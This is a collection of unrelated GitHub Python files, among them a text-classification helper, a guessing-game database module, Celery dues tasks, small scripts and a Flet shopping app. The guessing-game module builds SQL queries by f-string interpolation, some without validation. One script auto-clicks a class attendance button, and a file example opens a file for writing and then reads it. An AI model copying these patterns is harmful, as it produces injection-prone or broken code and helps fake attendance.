= np.matrix(contentL2, dtype=int)\n Label_L2 = np.transpose(Label_L2)\n np.random.seed(7)\n print(Label.shape)\n print(Label_L2.shape)\n Label = np.column_stack((Label, Label_L2))\n\n number_of_classes_L2 = np.zeros(number_of_classes_L1,dtype=int)\n\n X_train, X_test, y_train, y_test = train_test_split(content, Label, test_size=0.2,random_state= 0)\n\n vectorizer_x = CountVectorizer()\n X_train = vectorizer_x.fit_transform(X_train).toarray()\n X_test = vectorizer_x.transform(X_test).toarray()\n\n L2_Train = []\n L2_Test = []\n content_L2_Train = []\n content_L2_Test = []\n\n for i in range(0, number_of_classes_L1):\n L2_Train.append([])\n L2_Test.append([])\n content_L2_Train.append([])\n content_L2_Test.append([])\n\n\n for i in range(0, X_train.shape[0]):\n L2_Train[y_train[i, 0]].append(y_train[i, 1])\n number_of_classes_L2[y_train[i, 0]] = max(number_of_classes_L2[y_train[i, 0]],(y_train[i, 1]+1))\n content_L2_Train[y_train[i, 0]].append(X_train[i])\n\n for i in range(0, X_test.shape[0]):\n L2_Test[y_test[i, 0]].append(y_test[i, 1])\n content_L2_Test[y_test[i, 0]].append(X_test[i])\n\n for i in range(0, number_of_classes_L1):\n L2_Train[i] = np.array(L2_Train[i])\n L2_Test[i] = np.array(L2_Test[i])\n content_L2_Train[i] = np.array(content_L2_Train[i])\n content_L2_Test[i] = np.array(content_L2_Test[i])\n return (X_train,y_train,X_test,y_test,content_L2_Train,L2_Train,content_L2_Test,L2_Test,number_of_classes_L2)\n","repo_name":"koustuvsinha/hier-class","sub_path":"Structured-Self-Attentive-Sentence-Embedding/HDLTex/Data_helper.py","file_name":"Data_helper.py","file_ext":"py","file_size_in_byte":10045,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"93"}
+{"seq_id":"12220102207","text":"from ..Base import Base\nfrom . import u_logger as log\n\n\nclass GuessingGame(Base):\n def __init__(self, *args):\n super().__init__(*args)\n\n async def update_user_guessing_game_score(self, difficulty, user_id, score):\n \"\"\"Update a user's guessing game score.\"\"\"\n try:\n user_scores = self.ex.cache.guessing_game_counter.get(user_id)\n # if the user does not exist, create them in the db & cache\n if not user_scores:\n await self.create_user_in_guessing_game(user_id)\n user_scores = {} # set to default so getting current user score does not error.\n difficulty_score = user_scores.get(difficulty) or 0\n # difficulty score will always exist, no need to have a condition.\n user_scores[difficulty] = difficulty_score + score\n await self.update_user_score_in_db(difficulty, user_scores[difficulty], user_id)\n except Exception as e:\n log.console(f\"{e} (Exception)\", method=self.update_user_guessing_game_score)\n\n async def create_user_in_guessing_game(self, user_id):\n \"\"\"Inserts a user into the guessing game db with no scores. This allows for updating scores easier.\"\"\"\n self.ex.cache.guessing_game_counter[user_id] = {\"easy\": 0, \"medium\": 0, \"hard\": 0}\n return await self.ex.conn.execute(\"INSERT INTO stats.guessinggame(userid) VALUES ($1)\", user_id)\n\n async def update_user_score_in_db(self, difficulty, score, user_id):\n return await self.ex.conn.execute(f\"UPDATE stats.guessinggame SET {difficulty} = $1 WHERE userid = $2\", score,\n user_id)\n\n async def get_guessing_game_top_ten(self, difficulty, members=None):\n \"\"\"Get the top ten of a certain guessing game difficulty\"\"\"\n # make sure it is actually a difficulty in case of s_sql-injection. (condition created in case of future changes)\n if difficulty.lower() not in self.ex.cache.difficulty_levels:\n raise ValueError(\"invalid difficulty given to get_guessing_game_top_ten()\")\n if members:\n return await self.ex.conn.fetch(f\"SELECT userid, {difficulty} FROM stats.guessinggame WHERE {difficulty} \"\n f\"is not null AND userid IN {members} ORDER BY {difficulty} DESC LIMIT 10\")\n return await self.ex.conn.fetch(f\"SELECT userid, {difficulty} FROM stats.guessinggame WHERE {difficulty} \"\n f\"is not null ORDER BY {difficulty} DESC LIMIT 10\")\n\n async def get_user_score(self, difficulty: str, user_id):\n user_scores = self.ex.cache.guessing_game_counter.get(user_id)\n if not user_scores:\n return 0\n difficulty_score = user_scores.get(difficulty) or 0\n return difficulty_score\n\n async def toggle_filter(self, user_id):\n \"\"\"Enables/Disables the group filter for the guessing game on a user.\"\"\"\n user = await self.ex.get_user(user_id)\n user.gg_filter = not user.gg_filter\n if user.gg_filter:\n await self.ex.conn.execute(\"INSERT INTO gg.filterenabled(userid) VALUES ($1)\", user.id)\n else:\n await self.ex.conn.execute(\"DELETE FROM gg.filterenabled WHERE userid = $1\", user.id)\n\n async def filter_auto_add_remove_group(self, user_or_id, group_or_id): # can also pass in a user or group.\n \"\"\"Automatically Add/Remove a group from a user's filtered group list based on the current list.\n\n :returns False if group was removed.\n :returns True if group was added.\n :exception self.ex.exceptions.InvalidParamsPassed if invalid group id.\"\"\"\n\n # check if a user was passed in instead of a user id\n if isinstance(user_or_id, self.ex.u_objects.User):\n user = user_or_id\n else:\n user = await self.ex.get_user(user_or_id)\n\n # check if a group was passed in instead of a group id\n if isinstance(group_or_id, self.ex.u_objects.Group):\n group = group_or_id\n else:\n group = await self.ex.u_group_members.get_group(group_or_id)\n\n # raise an exception if we have an invalid group id.\n if not group:\n raise self.ex.exceptions.InvalidParamsPassed(f\"Invalid Group ID ({group_or_id}) was passed in...\")\n\n # add group if not already filtered.\n if group not in user.gg_groups:\n await self.filter_add_group(user, group)\n return True # signifies that a group was added.\n\n # remove group if already filtered.\n else:\n await self.filter_remove_group(user, group)\n return False # signifies that a group was removed.\n\n async def filter_add_group(self, user, group):\n \"\"\"Adds a filtered group to a user.\"\"\"\n user.gg_groups.append(group)\n await self.ex.conn.execute(\"INSERT INTO gg.filteredgroups(userid, groupid) VALUES($1, $2)\",\n user.id, group.id)\n\n async def filter_remove_group(self, user, group):\n \"\"\"Remove a filtered group from a user.\"\"\"\n user.gg_groups.remove(group)\n await self.ex.conn.execute(\"DELETE FROM gg.filteredgroups WHERE userid = $1 AND groupid = $2\",\n user.id, group.id)\n\n\n# self.ex.u_guessinggame = GuessingGame()\n","repo_name":"MujyKun/IreneUtility","sub_path":"IreneUtility/util/u_guessinggame.py","file_name":"u_guessinggame.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"6057583972","text":"\nfrom celery.utils.log import get_task_logger\nfrom rel8.celery import app\nfrom django.contrib.auth import get_user_model\nfrom Dueapp import models\nfrom celery import shared_task\nfrom account.models import user as user_related_models\nfrom django.db.models import Q\n\nlogger = get_task_logger(__name__)\n\n@app.task()\ndef create_exco_due(due_id,exco_id):\n # users =get_user_model().objects.all().filter(\n # user_type='members',exci__id=exco_id)\n due =models.Due.objects.get(id=due_id)\n excoRole = user_related_models.ExcoRole.objects.get(id=exco_id)\n for member in excoRole.member.all():\n # let set the members that are being Charge it is_financial=False\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\ndef create_membership_due(due_id,membershipgrade_id):\n grade=user_related_models.MemberShipGrade.objects.get(id=membershipgrade_id)\n due = models.Due.objects.get(id=due_id)\n\n for member in grade.member.all():\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\n \n\n@app.task()\ndef create_due_job(due_id,chapterID=None):\n \"\"\"\n this function create general dues\n \"\"\"\n logger.info(f'{due_id},{type(due_id) } from matthew chapterID:{chapterID} ' )\n if chapterID:\n # get all users with the chapterID \n users =get_user_model().objects.all().filter(\n user_type='members',chapter__id=chapterID)\n\n else:\n # else just get all users\n users =get_user_model().objects.all().filter(\n user_type='members',)\n\n due =models.Due.objects.get(id=due_id)\n for eachMember in users:\n # let set the members that are being Charge it is_financial=False\n 'is_for_excos if it false that means we getting all users else if its for only excos'\n member = user_related_models.Memeber.objects.get(user=eachMember,)\n models.Due_User.objects.create(\n user =member.user,\n due = due,\n amount=due.amount,\n is_overdue=False\n )\n member.amount_owing = member.amount_owing - due.amount\n member.save()\n\n# @shared_task\ndef create_deactivating_user_model(id,chapterID=None):\n \"this would create DeactivatingDue for each user so they can pay\"\n # \"\"\"\n # we not nessary creating a new due we just using the info of the due to charge a user\n # \"\"\"\n \n try:\n if chapterID:\n # get all users with the chapterID \n users =get_user_model().objects.all().filter(\n user_type='members',chapter__id=chapterID)\n\n else:\n # else just get all users\n users =get_user_model().objects.all().filter(\n user_type='members',)\n deactivatingDue =models.DeactivatingDue.objects.get(id=id)\n for eachMember in users:\n member = user_related_models.Memeber.objects.get(user=eachMember)\n member.amount_owing=member.amount_owing-deactivatingDue.amount\n member.save()\n \"we are creating\"\n dueUser = models.DeactivatingDue_User.objects.create(\n user = eachMember,\n deactivatingdue=deactivatingDue,\n amount = deactivatingDue.amount\n )\n dueUser.save()\n \n logger.info('Created payment succesffully')\n except models.Due.DoesNotExist:\n logger.info('hello the Due DOes not exist')\n \n@app.task()\ndef deactivate_owing_members(id,chapterID=None):\n 'get all due_users that are meant to pay the Due'\n due = models.Due.objects.get(id=id)\n all_due_user = models.Due_User.objects.all().filter(due=due)\n for each_user in all_due_user:\n if each_user.is_paid ==False:\n each_user.is_overdue=True\n each_user.save()\n member = user_related_models.Memeber.objects.get(\n user=each_user.user)\n member.is_financial=False\n member.save()\n\n\n\n\n@app.task()\ndef deactivating_due_job(deactivatingdueID,chapterID=None):\n \"we look for all DeactivatingDue_User that has to do with DeactivatingDue check if they have paid else we going to deactivate that user \"\n all_users_deactivating_dues = models.DeactivatingDue_User.objects.filter(deactivatingdue=deactivatingdueID)\n\n for user_deactivating_due in all_users_deactivating_dues:\n # set the payment to overdue\n if user_deactivating_due.is_paid==False:\n user_deactivating_due.is_overdue=True\n user_deactivating_due.save()\n # deactivate this user\n member = user_related_models.Memeber.objects.get(user=user_deactivating_due.user)\n member.is_financial=False#because it time for payment and the user is owing that why we tag it false\n member.save()\n currentUser = get_user_model().objects.get(id=user_deactivating_due.user.id)\n currentUser.is_active=False\n currentUser.save()","repo_name":"Tomation-Solution/rel8backend","sub_path":"Dueapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"24851790755","text":"NY=list(map(int,input().strip().split()))\r\nN=NY[0]\r\nY=NY[1]\r\n\r\ns=False\r\nfor a in range(N+1):\r\n for b in range(a,N+1):\r\n sumN=a*10000+(b-a)*5000+(N-b)*1000\r\n if sumN==Y:\r\n s=True\r\n x=a\r\n y=b-a\r\n z=N-b\r\n if s:\r\n break\r\n\r\nif s==True:\r\n print(\"{} {} {}\".format(x,y,z))\r\nelse:\r\n print(\"-1 -1 -1\")","repo_name":"Kuroboo100/atcoder","sub_path":"abc_85_C.py","file_name":"abc_85_C.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"2481000323","text":"#This file handles the entire background, to include random star generation\nimport pygame\nimport constants as c\nfrom star import Star\nimport random\n\nclass BG(pygame.sprite.Sprite): #inherit from Sprite object from pygame\n def __init__(self):\n super(BG, self).__init__()\n self.image = pygame.Surface(c.DISPLAY_SIZE) #create image for the entire screen size\n self.color = (0, 0, 15)\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.stars = pygame.sprite.Group() #create Sprite group of stars\n self.timer = random.randrange(1, 10)\n\n\n def update(self):\n self.stars.update() #we call the stars update function here\n for star in self.stars:\n if star.rect.y >= c.DISPLAY_HEIGHT:\n self.stars.remove(star)\n if self.timer == 0:\n new_star = Star()\n self.stars.add(new_star) #add new star to group\n self.timer = random.randrange(1, 10)\n self.image.fill(self.color)\n self.stars.draw(self.image)\n self.timer -= 1","repo_name":"lrombado/Galaga_project","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"5956117174","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport json\nimport re\nimport base64\nimport urllib.parse\n\nFILENAME = '1-fm.json' # from 'https://www.1.fm/mainstations'\nSTYLESHEET = 'flags.css' # from https://www.1.fm/less/flags.css\nMASK = re.compile(u'\\.bg([^{,]*)\\{background(?:-image)?:url\\(data:image\\/svg\\+xml;base64,([^}]+)\\)\\}')\nOUTPUT = 'backgrounds.css'\nTEMPLATE = '''\\\n.bg-%s { background-image: url(data:image/svg+xml,%s); }\n'''\n\ndef main(args):\n\tstations = None\n\twith open(FILENAME) as f:\n\t\tstations = json.load(f)\n\tstationIds = [s['id'] for s in stations]\n\tprint('|'.join(stationIds))\n\n\tcontent = ''\n\twith open(STYLESHEET) as f:\n\t\tcontent = f.read()\n\tmatches = MASK.findall(content)\n\twith open(OUTPUT, 'w') as out:\n\t\tfor k,v in matches:\n\t\t\tprint(k)\n\t\t\ti = base64.standard_b64decode(v)\n\t\t\tout.write(TEMPLATE % (k, urllib.parse.quote(i)))\n\treturn 0\n\nif __name__ == '__main__':\n\timport sys\n\tsys.exit(main(sys.argv))\n","repo_name":"nadim24/nadim24.github.io","sub_path":"karadio32/plugins/1-fm/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"35544277211","text":"# File operations\n# 2 options\n\n# Option 1:\nf = open(\"file.txt\", \"w\")\ncontent = f.read()\nf.close() # close() method shall be called!!!!\n\n\n# Option 2:\nwith open(\"file.txt\", \"w\") as f:\n content = f.read()\n # some other operations on the file, no need to call close() method\n\n\n\n\n\n\n\n\n\n","repo_name":"erhyilmaz/PythonRepo","sub_path":"PythonSeleniumCourse/course_examples/files/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"39067068935","text":"'''\n 特别说明:本人不对使用该程序造成的任何后果负责,建议合理使用本程序\n 该程序签到功能仅在我的电脑实验成功\n 请务必用管理员身份运行,否则无法签到!!!\n XiaoBai Apr 22,2022 \n'''\nimport cv2\nimport pyautogui #自动GUI操作\nimport pyscreeze #屏幕截图\nfrom time import sleep \ncount=0 #签到次数 \ndef sign():\n ####目标图片读取&截屏,路径根据自己需要更改####\n target_button=cv2.imread('C:/pic/button.png', cv2.IMREAD_GRAYSCALE) #设置签到按钮图片,最好用自己电脑截图\n screenshot=pyscreeze.screenshot('C:/pic/screenshot.png')#截图\n target_screenshot=cv2.imread('C:/pic/screenshot.png', cv2.IMREAD_GRAYSCALE)#cv2读入截屏\n ####获取签到按钮照片的宽高#### \n sp=target_button.shape\n button_height=sp[0]\n button_width=sp[1]\n ####图片匹配#####\n result = cv2.matchTemplate(target_screenshot, target_button, cv2.TM_CCOEFF_NORMED)\n mn_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n #min_val、max_val都是输入的矩阵中的最小值和最大值\n #min_loc、 max_loc都是最小值 最大值所对应的坐标元组 \n return max_val,max_loc,button_width,button_height\n \nwhile 1: \n max_val,max_loc,button_width,button_height=sign() \n if max_val >= 0.8:\n ####计算签到按钮位置#### \n taget_X=max_loc[0]+int(button_width/2)\n taget_Y=max_loc[1]+int(button_height/2) \n ###鼠标左键点击所计算的目标点#### \n pyautogui.click(taget_X, taget_Y, button='left') \n ####2秒后再次确认签到按钮是否消失####\n sleep(3)\n max_val,max_loc,button_width,button_height=sign() \n if max_val >= 0.8:\n print(\"警告:签到可能失败,请及时确认!\")\n else:\n ####结果输出#####\n count+=1\n print(\"已经完成\",count,\"次签到\")\n sleep(10) #暂停10秒继续执行 可以根据老师签到时间把这个值改高点\n","repo_name":"XiaoBai1103/tengxun_sign","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"}
+{"seq_id":"17550057520","text":"def selection_sort(arr):\n for i in range(len(arr)):\n # Find the minimum element in the unsorted portion of the array\n min_index = i\n for j in range(i+1, len(arr)):\n if arr[j] < arr[min_index]:\n min_index = j\n \n # Swap the minimum element with the first element of the unsorted portion\n arr[i], arr[min_index] = arr[min_index], arr[i]\n\n# Test the function\narr = [5, 2, 8, 1, 9, 3]\nselection_sort(arr)\nprint(arr) # Output: [1, 2, 3, 5, 8, 9]\n","repo_name":"eigenkt/algo","sub_path":"sorting/selectionsort/python/selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"9579808104","text":"def solution(gems):\n gem_len = len(set(gems))\n # print(set(gems))\n answer = []\n cur_have = []\n si, ei = 0, 0\n result = []\n\n while si < len(gems) and ei <= len(gems):\n if len(set(cur_have)) < gem_len:\n if ei == len(gems): break\n cur_have.append(gems[ei])\n ei += 1\n else:\n result.append((si+1,ei,ei-si))\n # print(result)\n cur_have.remove(gems[si])\n si += 1\n\n result = sorted(result, key=lambda x:(x[2],x[0]))\n # print(result)\n\n return [result[0][0],result[0][1]]","repo_name":"sglee487/Coding-test","sub_path":"기타/2020 카카오 인턴십 for Tech developers 문제/3. 보석 쇼핑(효율성 실패2).py","file_name":"3. 보석 쇼핑(효율성 실패2).py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"19656512982","text":"import requests\nimport json\nimport sys\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom scipy.optimize import curve_fit\nfrom matplotlib.ticker import PercentFormatter\nfrom scipy import stats\n# get all\nurl = 'http://localhost:5000/waitingminedtime'\n# url = 'http://localhost:5000/waitingtime'\n# url = 'http://localhost:5000/gasstat'\n\n# get avg\n# url = 'http://localhost:5000/gasavg'\n# url = 'http://localhost:5000/minedavg'\n\nheaders = {'content-type': 'application/json'}\nresponse = requests.get(url, headers=headers)\n# print(response.content)\nresults = json.loads(response.content.decode())\n\nprint('count: ', str(len(results)))\nprint('an example of result:', results[0])\n\n# gas_price of a transaction\nx = []\nx_positive = []\nx_negative = []\n# waiting_time of a transaction\ny = []\ny_positive = []\ny_negative = []\n\nfor row in results:\n gas_price = row['_id']\n time = row['value']\n # if(gas_price <= 50):\n # if(gas_price <= 3) and (time <= 1000):\n if (gas_price >= 0) and (gas_price <= 0.2):\n # if(gas_price <= 10) and (time <= 400):\n # if(gas_price <= float(\"inf\")) and (time <= float(\"inf\")):\n x.append(gas_price)\n y.append(time) \n\n if(time > 0):\n x_positive.append(gas_price)\n y_positive.append(time)\n else:\n x_negative.append(gas_price)\n y_negative.append(time)\n\n\n# get the max of actual cost\nprint('the max gas price is: ', str(max(x)))\nprint('the min gas price is: ', str(min(x)))\nprint('the max time is: ', str(max(y)))\nprint('the min time is: ', str(min(y)))\nprint(len(x))\nprint(len(y))\n\nif(len(x_negative) > 0):\n print('the max gas price is: ', str(max(x_negative)))\n print('the min gas price is: ', str(min(x_negative)))\n\nplt.scatter(x,y,c='g')\nplt.scatter(x_positive,y_positive,c='r')\nplt.scatter(x_negative,y_negative,c='b')\n\n# fig, axs = plt.subplots(1, 3, sharey=True, tight_layout=True)\n# plt.title('Relation between gas price and time')\nplt.xlabel('gas price')\nplt.ylabel('time')\n\n# # Plot original data\n# axs[0].scatter(x, y, c=\"g\")\n# axs[1].scatter(x_positive, y_positive, c=\"r\")\n# axs[2].scatter(x_negative, y_negative, c=\"b\")\n\n\nplt.legend()\nplt.show()\n# # Set ranges of x-axis and y-axis\n# plt.xlim(0,50)\n# # # # plt.xlim(0.2,0.4)\n# plt.ylim(0,500)\n\n\n#\n\n# # matplotlib histogram\n# plt.hist(x, color = 'blue', edgecolor = 'black',\n# bins = int(180/5))\n\n# # seaborn histogram\n# sns.distplot(x, hist=True, kde=False, \n# bins=int(180/5), color = 'blue',\n# hist_kws={'edgecolor':'black'})\n\n# plt.hist(y, weights=np.ones(len(y)) / len(y))\n# plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n# # Add labels\n# plt.title('Histogram of time')\n# plt.xlabel('time')\n# plt.ylabel('distribution of time')\n# plt.show()\n\n\n# axs[0].hist(x_positive, weights=np.ones(len(y)) / len(y))\n\n# kolmogrove test\n# result = stats.ks_2samp(x_positive,x_negative)\n# print(result)\n# result = stats.ks_2samp(y_positive,y_negative)\n# print(result)\n\n#box plot\n# test = [x_positive, x_negative]\n# plt.boxplot(test)\n# # plt.boxplot(x_positive)\n# # plt.boxplot(x_negative)\n# plt.legend()\n# plt.show()","repo_name":"RightMesh/payment-channel-performance","sub_path":"web/plot_time.py","file_name":"plot_time.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"20528565321","text":"import flet as ft\n\n\ndef main(page: ft.Page):\n page.title=\"Bienvenido a su frutería de confianza!\"\n caja_número_1= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_2= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_3= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_4= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n caja_número_5= ft.TextField(value=\"0\", text_align=ft.TextAlign.RIGHT, width=100)\n def menus_click_1(e):\n caja_número_1.value = str(int(caja_número_1.value) - 1) \n page.update()\n\n def plus_click_1(e):\n caja_número_1.value = str(int(caja_número_1.value) + 1)\n page.update()\n \n def menus_click_2(e):\n caja_número_2.value = str(int(caja_número_2.value) - 1) \n page.update()\n\n def plus_click_2(e):\n caja_número_2.value = str(int(caja_número_2.value) + 1)\n page.update()\n \n def menus_click_3(e):\n caja_número_3.value = str(int(caja_número_3.value) - 1) \n page.update()\n\n def plus_click_3(e):\n caja_número_3.value = str(int(caja_número_3.value) + 1)\n page.update()\n \n def menus_click_4(e):\n caja_número_4.value = str(int(caja_número_4.value) - 1) \n page.update()\n\n def plus_click_4(e):\n caja_número_4.value = str(int(caja_número_4.value) + 1)\n page.update()\n \n def menus_click_5(e):\n caja_número_5.value = str(int(caja_número_5.value) - 1) \n page.update()\n\n def plus_click_5(e):\n caja_número_5.value = str(int(caja_número_5.value) + 1)\n page.update()\n def finalizar_Compra():\n print(vCompra)\n\n\n \n \n \n \n vCompra=[]\n def añadir_producto(e):\n if dropDownMenúVerduras.value!=None:\n vCompra.append(dropDownMenúVerduras.value)\n dropDownMenúVerduras.clean\n else:\n print(\"No ha seleccionado nada.\")\n \n \n \n botón_Añadir_Verduras=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Carnes=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Pescados=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Cervezas=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Añadir_Botellas=ft.FilledButton(text=\"Añadir\", icon=\"Añadir\", on_click=añadir_producto)\n botón_Finalizar_Compra=ft.FilledButton(text=\"Finalizar Compra\", icon=\"Añadir\", on_click=finalizar_Compra)\n \n\n\n #Componente Texto\n texto_Título =ft.Text(value=\"Buenas caballero, ¿qué desea comprar?\", color=\"black\", size=20)\n page.add(texto_Título)#add hace dos cosas: 1- Añadir 2- Actualizar\n \n texto_Título_Sección_Verduras=ft.Text(value=\"sección de Verduras\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Verduras)\n\n\n dropDownMenúVerduras = ft.Dropdown(width=300, options=[ft.dropdown.Option(\"lechuga 0,9$/kg\"),\n ft.dropdown.Option(\"naranjas 2$/kg\"),\n ft.dropdown.Option(\"alcachofas 0,9$/kg\"),\n ft.dropdown.Option(\"moras 50$/kg\"),\n ft.dropdown.Option(\"pepinillos 1,2$/kg\"),\n ft.dropdown.Option(\"tomate para el mejor gazpacho 2$/kg\")])\n fila1 = ft.Row(spacing=50, controls=[dropDownMenúVerduras,botón_Añadir_Verduras] ) \n page.add(fila1)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_1),caja_número_1,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_1)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n texto_Título_Sección_Pescados=ft.Text(value=\"sección de Pescados\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Pescados)\n dropDownMenúPescados = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Almejas 20$/kg\"),\n ft.dropdown.Option(\"Sardinas 50$/kg\"),\n ft.dropdown.Option(\"Calamares 50$/kg\"),\n ft.dropdown.Option(\"Gambones 100$/kg\"),\n ft.dropdown.Option(\"Aleta de Tiburón 5000$/kg\"),\n ft.dropdown.Option(\"Atún Rojo 100.000.$/kg\")])\n fila2 = ft.Row(spacing=0, controls=[dropDownMenúPescados,botón_Añadir_Pescados] ) \n page.add(fila2)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_2),caja_número_2,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_2)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n\n\n \n\n\n texto_Título_Sección_Carnes=ft.Text(value=\"sección de Carnes\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Carnes)\n dropDownMenúCarnes = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Pechiga 10$/kg\"),\n ft.dropdown.Option(\"rabo de Toro 50$/kg\"),\n ft.dropdown.Option(\"Carne de Hereford 75$/kg\"),\n ft.dropdown.Option(\"Carne de Angus 100$/kg\"),\n ft.dropdown.Option(\"Carne de Ozaki 50.000$/kg\"),\n ft.dropdown.Option(\"Carne de Kobe 1000.000$/kg\")])\n fila3 = ft.Row(spacing=0, controls=[dropDownMenúCarnes,botón_Añadir_Carnes] ) \n page.add(fila3)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_3),caja_número_3,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_3)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n\n \n texto_Título_Sección_Cervezas=ft.Text(value=\"sección de Cervezas\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Cervezas)\n dropDownMenúCervezas = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Mahou 1$/unidad\"),\n ft.dropdown.Option(\"Cruzcampo 1$/unidad\"),\n ft.dropdown.Option(\"Estrella Galicia 10$/unidad\"),\n ft.dropdown.Option(\"Alhambra 10$/unidad\"),\n ft.dropdown.Option(\"Salto Stout 20$/unidad\"),\n ft.dropdown.Option(\"Heineken 30$/unidad\")])\n fila4 = ft.Row(spacing=0, controls=[dropDownMenúCervezas,botón_Añadir_Cervezas] ) \n page.add(fila4)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_4),caja_número_4,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_4)],\n alignment=ft.MainAxisAlignment.CENTER))\n \n \n \n\n texto_Título_Sección_Botellas=ft.Text(value=\"sección de Botellas\", color=\"black\", size=20)\n page.add(texto_Título_Sección_Botellas)\n dropDownMenúBotellas = ft.Dropdown(width=400, options=[ft.dropdown.Option(\"Barcelo 12$/unidad\"),\n ft.dropdown.Option(\"Bombay 20$/unidad\"),\n ft.dropdown.Option(\"Beefeter 150$/unidad\"),\n ft.dropdown.Option(\"champagne Francés 80$/unidad\"),\n ft.dropdown.Option(\"Jageer 20$/unidad\"),\n ft.dropdown.Option(\"Tequila 30$/unidad\")])\n fila5 = ft.Row(spacing=0, controls=[dropDownMenúBotellas,botón_Añadir_Botellas] ) \n page.add(fila5)\n page.add(\n ft.Row(\n [ft.IconButton(ft.icons.REMOVE, on_click=menus_click_5),caja_número_5,\n ft.IconButton(ft.icons.ADD, on_click=plus_click_5)],\n alignment=ft.MainAxisAlignment.CENTER))\n\n\n #slider_Botellas=ft.Slider(min=0, max=50,divisions=50, label=\"Unidades{value}\")\n #page.add(slider_Botellas)\n\n\n\n fila6 = ft.Row(spacing=250, controls=[botón_Finalizar_Compra] ) \n page.add(fila6)\n \n \n\n \n\n\n\nft.app(target=main)","repo_name":"Albertoguiradoo/Ejemplo-Git_a","sub_path":"aplicacion_frutería.py","file_name":"aplicacion_frutería.py","file_ext":"py","file_size_in_byte":8795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"70716740148","text":"# Задача 1. Однострочный код\n#\n# Пользователь вводит неопределённое количество чисел. Напишите код, который запрашивает эти числа и сортирует их по возрастанию.\n# Реализуйте решение в одну строку.\n#\n#\n#\n# Пример работы консоли:\n#\n# Введите числа: 5 8 4 1 0 3\n#\n# [0, 1, 3, 4, 5, 8]\n#\n#\n#\n\nnumbers = input(\"Введите числа: \")\nprint(sorted(list(map(int, numbers.split()))))\n\n# Задача 2. Однострочный код 2\n#\n# Пользователь вводит строку, состоящую из любых символов. Напишите код, который выводит на экран список этих символов,\n# исключая цифры и буквы в верхнем регистре.\n#\n#\n#\n# Пример работы консоли:\n#\n# Введите строку: qWe456rtY\n#\n# ['q', 'e', 'r', 't']\n#\n#\n#\n\ntext = input(\"Введите строку: \")\n\nprint(list(filter(lambda x: not (x.isupper() or x.isdigit()), text)))\n\n# Задача 3. Функция reduce\n#\n# Помимо map и filter, есть ещё одна функция — reduce. Она применяет указанную функцию к элементам последовательности,\n# сводя её к единственному значению. Однако используют reduce довольно 